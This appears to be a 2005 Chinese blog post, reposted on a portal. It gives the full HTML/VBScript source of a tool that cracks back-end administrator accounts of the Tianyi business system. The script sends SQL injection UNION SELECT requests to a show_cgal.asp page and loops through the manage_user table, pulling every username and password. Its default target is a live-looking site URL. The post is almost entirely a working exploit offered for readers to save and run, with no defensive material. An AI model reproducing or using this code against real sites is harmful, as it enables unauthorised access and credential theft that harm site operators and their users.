首页 编程 软件学院 查看内容

天意商务系统后台管理帐号破解html版

2005-1-15 04:42 951 0

摘要: 天意商务系统后台管理帐号破解html版 /**慈勤强http://blog.csdn.net/cqq*/ 自从上次写了个天意商务系统破解程序之后, 收到了不少朋友的来信, 有询问程序原理的,有...
关键词: nbsp 帐号 系统 天意 html 商务 Injection 后台 源文件 管理

天意商务系统后台管理帐号破解html版 /**慈勤强http://blog.csdn.net/cqq*/ 自从上次写了个天意商务系统破解程序之后, 收到了不少朋友的来信, 有询问程序原理的,有询问如何防护的。   今天,我抽了一点时间,做了这个Html版,就只有这一个htm文件 相信有点html知识和SQL Injection知识的朋友都能够看懂 原理非常简单,破解用户帐号是用的SQL Injection方法, 因为这套系统好多地方存在sql injection漏洞, 然后自己下载个这套系统,就可以很方便的找出问题了。   以前是Vc++版本,现在是html版本,不过都是一样, 就是通过http协议取得网页的源文件 然后分析源文件,找到用户名和密码 并且显示出来。 下面是源代码,大家只要把这个文件保存到硬盘上,起名叫ty.htm,就可以了。<html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>天意商务系统后台管理帐号破解html版--慈勤强制作</title><SCRIPT Language = "VbScript">Function bytes2BSTR(vIn) strReturn = "" For i = 1 To LenB(vIn)  ThisCharCode = AscB(MidB(vIn,i,1))  If ThisCharCode < &H80 Then   strReturn = strReturn & Chr(ThisCharCode)  Else   NextCharCode = AscB(MidB(vIn,i+1,1))   strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))   i = i + 1  End If Next bytes2BSTR = strReturnEnd Function Sub OpenUrl(strUrl)       strTmp = "" strUser = "!" strAAA ="" strCqq="" i=0 on Error Resume Next  While Trim(strUser) <> ""     strPara = "/wlyx/show_cgal.asp?newsid=1%20and%201=2%20union%20select%201,username%2b'***'%2bpassword,3,4,5,6%20from%20manage_user%20where%20username>'" + strUser + "'%20union%20select%20*%20from%20cgal%20where%201=2"    Set xmlhttp = CreateObject("Microsoft.XMLHTTP")     xmlhttp.open "GET",(strUrl + strPara),false     xmlhttp.send       strAAA=getMid(bytes2BSTR(xmlhttp.ResponseBody), "<title>", "</title>")  If Trim(strAAA) <> "" Then         arr = Split(strAAA, "***")         strUser = arr(0)         strCqq = strCqq + vbNewLine + "用户名:" + strUser + vbNewLine + "密  码:" + arr(1) + vbNewLine + vbNewLine     Else         strUser = ""     End If     //msgbox xmlhttp.Response     Set xmlhttp = Nothing Wend If strCqq<>"" Then  strCqq="破解的后台管理帐号为:(后台默认地址:"+strUrl+"/admin)"+vbCrLF+VBCRLF+strCqq+vbnewline     cqqadmin.innerText=strCqq Else  cqqadmin.innerText="出错" End If    End Sub   Function getMid(str, str1, str2)    str11 = ""    i = InStr(str, str1)    If i > 0 Then        j = InStr(i, str, str2)        If j > 0 Then            str11 = Mid(str, i + Len(str1), j - i - Len(str1))                End If        End If        getMid = str11End Function </script><style type="text/css"><!--body,td,th { font-size: 9pt;}--></style></head> <body><br><table width="600" border="1" align="center" cellpadding="2" cellspacing="0" bordercolor="#D4D4D4" bgcolor="#E4E4E4">  <tr>    <td width="39%">天意商务系统后台管理帐号破解html版</td>    <td align="right">Powered By Steven_Cee <a href="Http://blog.csdn.net/cqq" target="_blank">Http://blog.csdn.net/cqq</a> </td>  </tr></table><br><table width="600" border="0" align="center" cellpadding="0" cellspacing="0">  <tr>    <td><form name="frmCqq" method="post"><input name="url" type="text" value="http://www.3shopok.net" size="44"><input type="button" name="submit" value="提交" onClick="vbscript:OpenUrl(window.frmCqq.url.value)"></form>  </td>  </tr></table><table width="600" border="0" align="center" cellpadding="0" cellspacing="0">  <tr>    <td width="20">&nbsp;  </td>    <td><span id="cqqadmin"></span></td>  </tr></table><table width="600" border="1" align="center" cellpadding="1" cellspacing="0" bordercolor="#E4E4E4" bgcolor="#E4E4E4">  <tr>    <td align="center">帮助说明,请看 </td>  </tr></table><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p></body></html>
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部